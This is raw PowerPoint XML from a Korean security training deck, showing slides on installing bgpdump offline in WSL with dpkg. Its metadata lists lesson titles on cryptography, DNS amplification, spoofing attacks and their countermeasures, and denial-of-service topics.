              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://archive.ubuntu.com/ubuntu/pool/universe/b/bgpdump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 이동하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump_1.6.0-2_amd64.deb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 다운로드한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>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우분투에서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패키지를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다운로드한 경로에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용하여 들어간다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다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 설치한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dpkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bgpdump_1.6.0-2_amd64.deb </a:t>
            </a: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4. bgpdump </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 쳐서 잘 설치되었는지 확인한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRP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5"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44E85FC0-5988-40D3-8C94-2A8E8FB1FE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="1" r="339" b="23775"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="2960670"/>
            <a:ext cx="5214695" cy="3300981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7D2DB8D-0520-4571-9BA4-79C619B56012}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6654260" y="2295367"/>
            <a:ext cx="4467849" cy="1133633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991284A-478D-4947-B442-937A0ED203C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8"/>
          <a:srcRect r="34208" b="14939"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6349714" y="3585040"/>
            <a:ext cx="5283534" cy="178269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D746132-1C59-4018-A365-FDC5875DB994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="4506005"/>
            <a:ext cx="5457453" cy="780494"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="그림 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB67231E-263B-4912-970C-EA6E9A018E92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId10"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262754" y="5800703"/>
            <a:ext cx="5282272" cy="575147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2224242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689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129392717"/>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12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>증폭 공격</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(DNS Amplification)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7"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Slowloris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41116</TotalTime>
  <Words>34034</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>7857</Paragraphs>
  <Slides>427</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427</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="450" baseType="lpstr">
      <vt:lpstr>Apple SD Gothic Neo</vt:lpstr>
      <vt:lpstr>AppleSDGothicNeo</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>HY중고딕</vt:lpstr>
      <vt:lpstr>Menlo</vt:lpstr>
      <vt:lpstr>Montserrat</vt:lpstr>
      <vt:lpstr>Nanum Gothic</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>Noto Sans KR</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Spoqa Han Sans</vt:lpstr>
      <vt:lpstr>돋움</vt:lpstr>
      <vt:lpstr>돋움, dotum, Helvetica, sans-serif</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/Environ/WSLOfflinePackageInstall   WSL 패키지 오프라인 설치(bgpdump)</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대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – 대칭키 vs 비대칭키</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA  현대암호 실습 – RSA 암호</vt:lpstr>
      <vt:lpstr>/Theory/T5/RSA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/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</vt:lpstr>
      <vt:lpstr>/Theory/T5/Block  현대암호 – Block Cipher</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/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고 분석</vt:lpstr>
      <vt:lpstr>/Theory/T17   소니피쳐스 사고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/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 재귀 쿼리</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 쿼리의 타입</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)</vt:lpstr>
      <vt:lpstr>/Theory/T32   DNS 증폭 공격(DNS Amplification)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/Training/Unit/Net/9  9. ARP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/9  9. ARP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/10  10. IP Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/11  11. DNS Spoofing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/Training/Unit/Net/11  11. DNS Spoofing -대응</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>/Training/Unit/Net/13  13. DDOS – Ping of Death</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/Training/Unit/Web/3  2. 취약점 직접 객체 참조</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783</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-02-08T02:39:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-07T03:27:54Z</dcterms:modified>
</cp:coreProperties>
</file>